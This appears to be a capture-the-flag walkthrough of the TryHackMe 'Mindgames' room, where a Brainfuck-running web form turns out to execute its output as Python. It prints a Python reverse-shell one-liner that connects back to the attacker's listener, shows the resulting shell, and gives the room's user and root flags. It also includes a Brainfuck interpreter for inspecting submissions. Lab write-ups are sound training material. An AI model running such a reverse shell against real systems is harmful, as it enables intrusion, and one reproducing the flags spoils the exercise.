Description:
Just a terrible idea...
No warnings. Attack it. Don't give up if you get stuck, enumerate more.
Link: https://tryhackme.com/room/mindgames
We start by enumerating the services with Nmap; fetching the web root with curl returns the following page:
user㉿parrot:/data/Mindgames$ curl -s http://10.10.211.54
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Mindgames.</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" type="text/css" media="screen" href="/main.css">
<script src="/main.js"></script>
</head>
<body onload="onLoad()">
<h1>Sometimes, people have bad ideas.</h1>
<h1>Sometimes those bad ideas get turned into a CTF box.</h1>
<h1>I'm so sorry.</h1>
<!-- That's a lie, I enjoyed making this. -->
<p>Ever thought that programming was a little too easy? Well, I have just the product for you. Look at the example code below, then give it a go yourself!</p>
<p>Like it? Purchase a license today for the low, low price of 0.009BTC/yr!</p>
<h2>Hello, World</h2>
<pre><code>+[------->++<]>++.++.---------.+++++.++++++.+[--->+<]>+.------.++[->++<]>.-[->+++++<]>++.+++++++..+++.[->+++++<]>+.------------.---[->+++<]>.-[--->+<]>---.+++.------.--------.-[--->+<]>+.+++++++.>++++++++++.</code></pre>
<h2>Fibonacci</h2>
<pre><code>--[----->+<]>--.+.+.[--->+<]>--.+++[->++<]>.[-->+<]>+++++.[--->++<]>--.++[++>---<]>+.-[-->+++<]>--.>++++++++++.[->+++<]>++....-[--->++<]>-.---.[--->+<]>--.+[----->+<]>+.-[->+++++<]>-.--[->++<]>.+.+[-->+<]>+.[-->+++<]>+.+++++++++.>++++++++++.[->+++<]>++........---[----->++<]>.-------------.[--->+<]>---.+.---.----.-[->+++++<]>-.[-->+++<]>+.>++++++++++.[->+++<]>++....---[----->++<]>.-------------.[--->+<]>---.+.---.----.-[->+++++<]>-.+++[->++<]>.[-->+<]>+++++.[--->++<]>--.[----->++<]>+.++++.--------.++.-[--->+++++<]>.[-->+<]>+++++.[--->++<]>--.[----->++<]>+.+++++.---------.>++++++++++...[--->+++++<]>.+++++++++.+++.[-->+++++<]>+++.-[--->++<]>-.[--->+<]>---.-[--->++<]>-.+++++.-[->+++++<]>-.---[----->++<]>.+++[->+++<]>++.+++++++++++++.-------.--.--[->+++<]>-.+++++++++.-.-------.-[-->+++<]>--.>++++++++++.[->+++<]>++....[-->+++++++<]>.++.---------.+++++.++++++.+[--->+<]>+.-----[->++<]>.[-->+<]>+++++.-----[->+++<]>.[----->++<]>-..>++++++++++.</code></pre>
<h2>Try before you buy.</h2>
<form id="codeForm">
<textarea id="code" placeholder="Enter your code here..."></textarea><br>
<button>Run it!</button>
</form>
<p></p>
<label for="outputBox">Program Output:</label>
<pre id="outputBox"></pre>
</body>
</html>
Intercepting the requests with Burp Suite shows that the form submits its contents to /api/bf asynchronously, via the JavaScript in main.js:
async function postData(url = "", data = "") {
    // Default options are marked with *
    const response = await fetch(url, {
        method: 'POST', // *GET, POST, PUT, DELETE, etc.
        cache: 'no-cache', // *default, no-cache, reload, force-cache, only-if-cached
        credentials: 'same-origin', // include, *same-origin, omit
        headers: {
            'Content-Type': 'text/plain'
        },
        redirect: 'follow', // manual, *follow, error
        referrerPolicy: 'no-referrer', // no-referrer, *client
        body: data // body data type must match "Content-Type" header
    });
    return response; // We don't always want JSON back
}

function onLoad() {
    document.querySelector("#codeForm").addEventListener("submit", function (event) {
        event.preventDefault()
        runCode()
    });
}

async function runCode() {
    const programBox = document.querySelector("#code")
    const outBox = document.querySelector("#outputBox")
    // The raw program text is POSTed to /api/bf and the response body is shown as-is
    outBox.textContent = await (await postData("/api/bf", programBox.value)).text()
}
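Before sending anything to /api/bf it is worth knowing what the sample programs on the page actually emit. The interpreter below is an example added to this writeup, not the room's server code; the 8-bit wrap-around cells, the 30,000-cell tape and the step limit are my assumptions about the interpreter behind /api/bf (the page's programs only terminate with wrapping cells, and a step limit is what stops a non-terminating submission from hanging the caller). Run against the "Hello, World" program copied from the index page, it yields the Python statement print("Hello, World") followed by a newline rather than the bare text, which tells a reviewer that the service treats a program's output as source code to run, a code-execution sink worth inspecting before any submission is executed.

```python
# Minimal Brainfuck interpreter used to inspect what a submitted program emits.
# Added example for this writeup, not the room's server code. The 8-bit
# wrap-around cells, tape size and step limit are assumptions about how the
# interpreter behind /api/bf behaves.

# "Hello, World" program copied verbatim from the index page above.
HELLO_WORLD_BF = (
    "+[------->++<]>++.++.---------.+++++.++++++.+[--->+<]>+.------.++[->++<]>."
    "-[->+++++<]>++.+++++++..+++.[->+++++<]>+.------------.---[->+++<]>."
    "-[--->+<]>---.+++.------.--------.-[--->+<]>+.+++++++.>++++++++++."
)


def match_brackets(code: str) -> dict:
    """Precompute matching '[' / ']' positions; reject unbalanced programs."""
    stack, pairs = [], {}
    for i, ch in enumerate(code):
        if ch == "[":
            stack.append(i)
        elif ch == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at offset {i}")
            j = stack.pop()
            pairs[i], pairs[j] = j, i
    if stack:
        raise ValueError(f"unmatched '[' at offset {stack[-1]}")
    return pairs


def run_bf(code: str, stdin: bytes = b"", tape_size: int = 30_000,
           max_steps: int = 1_000_000) -> bytes:
    """Execute `code` and return everything it writes with '.'.

    Cells are unsigned 8-bit and wrap (the page's first loop, +[------->++<],
    only terminates because 1 - 7k wraps to 0 after 183 iterations).
    `max_steps` bounds the run so a looping program raises instead of hanging.
    """
    pairs = match_brackets(code)
    tape = bytearray(tape_size)
    ptr = pc = steps = in_pos = 0
    out = bytearray()
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded")
        ch = code[pc]
        if ch == ">":
            ptr += 1
            if ptr >= tape_size:
                raise IndexError("tape pointer ran off the right end")
        elif ch == "<":
            if ptr == 0:
                raise IndexError("tape pointer ran off the left end")
            ptr -= 1
        elif ch == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif ch == ".":
            out.append(tape[ptr])
        elif ch == ",":
            # EOF reads as 0, a common Brainfuck convention
            tape[ptr] = stdin[in_pos] if in_pos < len(stdin) else 0
            in_pos += 1
        elif ch == "[" and tape[ptr] == 0:
            pc = pairs[pc]          # skip the loop body
        elif ch == "]" and tape[ptr] != 0:
            pc = pairs[pc]          # back to the matching '['
        # any other character is a comment
        pc += 1
    return bytes(out)


def decode_sample() -> str:
    """Run the page's 'Hello, World' program and return its output as text."""
    return run_bf(HELLO_WORLD_BF).decode("ascii")


if __name__ == "__main__":
    print(repr(decode_sample()))
```

The same function can be fed the Fibonacci program from the page (or anything captured from a POST to /api/bf) to see what a submission resolves to before the server-side interpreter ever runs it.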
Reverse shell
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.50.72",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);

user㉿parrot:/data/Mindgames$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.211.54] 38032
bash: cannot set terminal process group (677): Inappropriate ioctl for device
bash: no job control in this shell
mindgames@mindgames:~/webserver$ id
id
uid=1001(mindgames) gid=1001(mindgames) groups=1001(mindgames)
mindgames@mindgames:~/webserver$
USER FLAG:
mindgames@mindgames:~/webserver$ cd /home
cd /home
mindgames@mindgames:/home$ ls -l
ls -l
total 8
drwxr-xr-x 6 mindgames mindgames 4096 May 11 15:36 mindgames
drwxr-x--- 5 tryhackme tryhackme 4096 May 11 15:25 tryhackme
mindgames@mindgames:/home$ cd mindgames
cd mindgames
mindgames@mindgames:~$ ls -la
ls -la
total 40
drwxr-xr-x 6 mindgames mindgames 4096 May 11 15:36 .
drwxr-xr-x 4 root      root      4096 May 11 13:48 ..
lrwxrwxrwx 1 mindgames mindgames    9 May 11 15:25 .bash_history -> /dev/null
-rw-r--r-- 1 mindgames mindgames  220 May 11 13:48 .bash_logout
-rw-r--r-- 1 mindgames mindgames 3771 May 11 13:48 .bashrc
drwx------ 2 mindgames mindgames 4096 May 11 14:07 .cache
drwx------ 3 mindgames mindgames 4096 May 11 14:07 .gnupg
drwxrwxr-x 3 mindgames mindgames 4096 May 11 15:24 .local
-rw-r--r-- 1 mindgames mindgames  807 May 11 13:48 .profile
-rw-rw-r-- 1 mindgames mindgames   38 May 11 15:24 user.txt
drwxrwxr-x 3 mindgames mindgames 4096 May 11 15:36 webserver
mindgames@mindgames:~$ cat user.txt
cat user.txt
thm{411f7d38247ff441ce4e134b459b6268}
ROOT FLAG:
mindgames@mindgames:/etc/systemd/system/multi-user.target.wants$ cat server.service
[Unit]
Description=Production Web Server

[Service]
User=mindgames
Group=mindgames
WorkingDirectory=/home/mindgames/webserver
ExecStart=/home/mindgames/webserver/server -p 80
Restart=always
RestartSec=5

[Install]
WantedBy=multi-user.target
mindgames@mindgames:/etc/systemd/system/multi-user.target.wants$ ls -la server.service
lrwxrwxrwx 1 root root 34 May 11 15:33 server.service -> /etc/systemd/system/server.service
Finally:
root@mindgames:~# cat /root/root.txt
thm{1974a617cc84c5b51411c283544ee254}
RECAP:
User flag.
thm{411f7d38247ff441ce4e134b459b6268}
Root flag.
thm{1974a617cc84c5b51411c283544ee254}